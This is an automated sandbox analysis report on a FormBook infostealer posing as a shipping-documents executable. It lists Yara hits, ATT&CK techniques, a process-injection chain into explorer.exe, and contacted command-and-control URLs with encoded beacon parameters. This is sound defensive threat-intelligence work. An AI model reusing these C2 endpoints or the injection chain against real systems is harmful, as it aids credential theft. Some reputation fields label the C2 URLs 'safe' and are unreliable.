          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403461

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery131Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 403523 Sample: 202139769574 Shipping Docum... Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 8 other signatures 2->42 10 202139769574 Shipping Documents.exe 19 2->10         started        process3 file4 28 C:\Users\user\AppData\...\22m80anrrsp.dll, PE32 10->28 dropped 52 Maps a DLL or memory area into another process 10->52 14 202139769574 Shipping Documents.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 shops.myshopify.com 23.227.38.74, 49754, 80 CLOUDFLARENETUS Canada 17->30 32 www.maluss.com 17->32 34 4 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 mstsc.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          202139769574 Shipping Documents.exe33%VirustotalBrowse
          202139769574 Shipping Documents.exe32%ReversingLabsWin32.Trojan.Injexa
          202139769574 Shipping Documents.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.202139769574 Shipping Documents.exe.3070000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.1.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          shops.myshopify.com0%VirustotalBrowse
          www.maluss.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.exclusiveflooringcollection.com/nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw0%Avira URL Cloudsafe
          http://www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          www.magnumopuspro.com/nyr/0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          shops.myshopify.com
          		23.227.38.74
          		truetrueunknown
          ext-sq.squarespace.com
          		198.185.159.144
          		truefalse
            		high
            www.maluss.com
            		unknown
            		unknowntrueunknown
            www.magnumopuspro.com
            		unknown
            		unknowntrue
              		unknown
              www.exclusiveflooringcollection.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.exclusiveflooringcollection.com/nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jwtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jwtrue
                • Avira URL Cloud: safe
                		unknown
                www.magnumopuspro.com/nyr/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.comexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                          		high
                          http://www.tiro.comexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_ErrorError202139769574 Shipping Documents.exefalse
                              		high
                              http://www.goodfont.co.krexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                		high
                                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                  		high
                                  http://nsis.sf.net/NSIS_Error202139769574 Shipping Documents.exefalse
                                    		high
                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.%s.comPAexplorer.exe, 00000004.00000002.909702700.0000000002B50000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		low
                                      http://www.fonts.comexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.krexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comexplorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        198.185.159.144
                                        		ext-sq.squarespace.comUnited States
                                        		53831SQUARESPACEUSfalse
                                        23.227.38.74
                                        		shops.myshopify.comCanada
                                        		13335CLOUDFLARENETUStrue

                                        General Information

                                        Joe Sandbox Version:32.0.0 Black Diamond
                                        Analysis ID:403523
                                        Start date:04.05.2021
                                        Start time:07:02:25
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 27s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:202139769574 Shipping Documents.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:25
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/4@3/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 19.3% (good quality ratio 17.4%)
                                        • Quality average: 74.1%
                                        • Quality standard deviation: 32%
                                        HCA Information:
                                        • Successful, ratio: 90%
                                        • Number of executed functions: 93
                                        • Number of non-executed functions: 59
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .exe

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        198.185.159.144S4qfwZnR6X.exeGet hashmaliciousBrowse
                                        • www.silhouettebodyspa.com/de92/?tHul=fdfLpdbpF&pPj8qlK=aW4bwX+7+rq/lVtFlzifkf7EnMQHuKASlHyg88U21n5YYvOPVn8iR8TT3SxMPq5PboHve2hfIg==
                                        d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                        • www.thebluefishhotel.net/qjnt/?h48x=QMUGPevm6Irjo8oPFEVzH6HtR6H2zoEQzpkVeMV2m2AjEhovI/wxUHuwVe7nA2+6+ZBUHg==&BZz=llM0X6
                                        PO_29_00412.exeGet hashmaliciousBrowse
                                        • www.missmaltese.com/hw6d/?wR9=6RCAxHzHs2U8cKrh6h9/ydGjrhxnSTzcOHDfHkTTDkA8hCV/5sMta/cQsHNALet3pcHc&3f=ZlLd8r8PtX
                                        triage_dropped_file.exeGet hashmaliciousBrowse
                                        • www.thebluefishhotel.net/qjnt/?r6q=QMUGPevj6PrnoskDHEVzH6HtR6H2zoEQzp8FCPJ3iWAiEQEpPvh9CDWyW7XbbWKJxYUk&rTFDm=GBOxAlxXYbRxGd
                                        SO.xlsm.exeGet hashmaliciousBrowse
                                        • www.innergardenhealing.space/vns/?LhyT=zVctTXmfihjFUsAOMVrNY/RZD+cbtBdO/414jUVl4R7yRJAmeLRzuR8nHqD+F0uaORIo&E8OxL=vBZhT2dHLjy0LJ
                                        RDAx9iDSEL.exeGet hashmaliciousBrowse
                                        • www.totally-seo.com/p2io/?KtxL=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MoCWZBvIMUw&NtTdXn=wXL40t9Hkrxhn
                                        MrV6Do8tZr.exeGet hashmaliciousBrowse
                                        • www.totally-seo.com/p2io/?IR-4RXN=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7PESKodUP59hGuNmhA==&Bl=lHL8SnehYVc
                                        jH10jDMcBZ.exeGet hashmaliciousBrowse
                                        • www.pimpmyrecipe.com/goei/?hBZpUr88=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9yrGt+CfvTHOy+nA==&ofuxZl=yVJLPZsh
                                        Bank Details.exeGet hashmaliciousBrowse
                                        • www.bkadvisor.solutions/oop8/?VxltT=6leXzhz0HpbTyjo0&uTCxy=9q1jRSOnnNf60k4S5uNju76o5PZZ5N10RY2/dWv7PNz7/EQQEm71kaM265hkKCffnmaelGAAXw==
                                        slystan.xlsm.exeGet hashmaliciousBrowse
                                        • www.innergardenhealing.space/vns/?LHQD=zVctTXmfihjFUsAOMVrNY/RZD+cbtBdO/414jUVl4R7yRJAmeLRzuR8nHpjuKV+iQ0hv&T6oxFd=cV5TBxmhbt1LOZ
                                        Order PO #5544 TULIP GROUP LLC , PDF.exeGet hashmaliciousBrowse
                                        • www.leonspropertysolutions.com/ewws/?OBttf=Rig5aSaUxJV4q+XrAdOvMvt+HSYND7QLvg+Ya6a+ZEgoSp/4o5PSorZAhMzJpSu+xT2Y&uTxX=ApmHH4
                                        qmhFLhRoEc.exeGet hashmaliciousBrowse
                                        • www.anewdistraction.com/p2io/?YrCXdBfh=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xDwqY+f6mMsY&EzuxZr=3fX4
                                        uNttFPI36y.exeGet hashmaliciousBrowse
                                        • www.anewdistraction.com/p2io/?CR=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAcDb+jCvvZO4wivfA==&QL0=ehux_83x40_XBX2
                                        RE New order.exeGet hashmaliciousBrowse
                                        • www.artagayne.com/bfak/?hnKTL2G=IEpF3fMuhFaVGoxUipaAbx4zzMr2AIwY1zqXBesPXpO0ClU4ldjrZa1VKGtyyF0e6Bf2&jL0Hir=Uxl4Q6Zhkt
                                        Shipping documents doc.exeGet hashmaliciousBrowse
                                        • www.mobcitylabs.com/gnk/?uTdLB8=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGvGaG9cV/7Lr&adWdvD=OfpxebaP
                                        Swift Copy#0002.exeGet hashmaliciousBrowse
                                        • www.ryannandrenee.com/ve9m/?-Z2D=RGPxIYcYYZMRssQx83blssQCW28eAYFOMhAVyeJzr7PHP1CJckGguhov8OVhYhGBnZIz&4h5=k2JX5xRHxZU0PLap
                                        Packing List.exeGet hashmaliciousBrowse
                                        • www.sanctumwell.com/chue/?k0GdoVb=LXiihE4+8betnnXE6wCUtZgfXL5im0GvFl2FnJa1SS/lY513m5Is9Ep+TyRGHAkUzeYb&NZeTzz=AbmdQfuHJ8KlVRip
                                        INV#609-005.PDF.exeGet hashmaliciousBrowse
                                        • www.ryannandrenee.com/ve9m/?vPDhx=RGPxIYcYYZMRssQx83blssQCW28eAYFOMhAVyeJzr7PHP1CJckGguhov8N1xXAW558h0&kfL8ap=F6AlIfF8e4F
                                        PaymentBNK#2.PDF.exeGet hashmaliciousBrowse
                                        • www.jeannegauliard.com/ve9m/?Jtx=rn2/WBoBBrSTDsPQBl5n5Tr1lIbuBbDEq2cf+qNtMvqv6yqW+TuUHUpYwKZu5L02o3jn&_jqp3V=gH2dK0JxIR5
                                        Payment Invoice.exeGet hashmaliciousBrowse
                                        • www.minterfortexas.com/chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP
                                        23.227.38.74Remittance Advice pdf.exeGet hashmaliciousBrowse
                                        • www.sewadorbsclothing.com/nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI
                                        74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.babyshopit.com/8u3b/?EzrxUr=TE3r3Po/80I3A7BjdmOrtV2X1cXMdBXcsPlehNMo8xFrjXCGEx4PM+IgH3zoRtc5Tgzkp+uvDw==&0VMt8D=3fJTbJlpxpVT_2d0
                                        don.exeGet hashmaliciousBrowse
                                        • www.funnyfootballmugs.com/uoe8/?BR=cjlpd&Y4plXns=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8
                                        WaybillDoc_7349796565.pdf.exeGet hashmaliciousBrowse
                                        • www.theestellawear.com/sbqi/?JtxL=Ofv0h5DUcgF1HBnP9jQv4WLSG1M3kjn+2XlmTbHkz/cbhvSYry19ohgdWpI3v2dkGCKs&pph=kJBTslxPNNKLxNz
                                        a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.exuberantemodafeminina.com/ued5/?t8o8ntU=P+YSthdRkosM1Kkk+FGYkcUIeENu2yCNDkfR3XxxXKvwa5X+dXL5WZZdMs5u6SZ4VnDl&kRm0q=J48P
                                        wMqdemYyHm.exeGet hashmaliciousBrowse
                                        • www.raiseamerican.com/f0sg/?7n0lqHm=YNkyISHPJk/bibwJBhOHtZm0DRLrV9PaArDWVr56RQ+cEQwRll7Xlbem2zoOENnktRSV&CP=chrxU
                                        PO#10244.exeGet hashmaliciousBrowse
                                        • www.dreamlikeliving.com/uv34/?xV8HslL8=5UaGcRQVNBURRiJV+9v1SQNlNBIBrH6pS93qQ4ZjH/IbytUWJvzWBvUcaoCYSFJ+DAMYTluhcw==&1bz=o8rHa
                                        493bfe21_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • www.advionpowergel.com/8njn/?CTvX=cvRh_lYP&uFNl=SvxnXnxPZ6/RXiCEA5gpWOUe8/6ZD7+WedveK6ILzn6yPy4OJmK7t7jGBRqeY+TLnjv1
                                        DocNo2300058329.exeGet hashmaliciousBrowse
                                        • www.exuberantemodafeminina.com/ued5/?RL0=P+YSthdRkosM1Kkk+FGYkcUIeENu2yCNDkfR3XxxXKvwa5X+dXL5WZZdMvZ+1zJALCqi&BR-d4N=7nMpkDO0IdLxFH6P
                                        x16jmZMFrN.exeGet hashmaliciousBrowse
                                        • www.covidpreventionshop.com/h6fe/?idCt3l3x=lvVfZQo4A24dNSGxxPwiOsdgHIv5tWk/cS3b4qunPdJKlwuQQcnTCZP3mbjBL0nYndss&Rv=Y2MpoVAxKRFDj0y
                                        TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                        • www.heoslight.com/maw9/?0V0hlZ=WKgLlhFhEzeNjFMge4LpHm5g+ODrZerh8srqhGFWn5kwTJLJyZ0r84PSd6yLMthvhFEa&OVolp8=AZ9lQ6QHS8EdPrG0
                                        z5Wqivscwd.exeGet hashmaliciousBrowse
                                        • www.raiseamerican.com/f0sg/?9rQPJl=YNkyISHPJk/bibwJBhOHtZm0DRLrV9PaArDWVr56RQ+cEQwRll7Xlbem2zokb9XkpTaV&EzrtFB=4hL05l3xNH1L
                                        DVO100024000.docGet hashmaliciousBrowse
                                        • www.americanstatesapparel.com/f0sg/?tDK=3tuwmvhMi7pGvx+mmUPwBEVcP0da4WtROkbfwo1L944cWBUw2PlAV4md2HmgZSuKmmCfDA==&LPYP_=Sfgd
                                        100005111.exeGet hashmaliciousBrowse
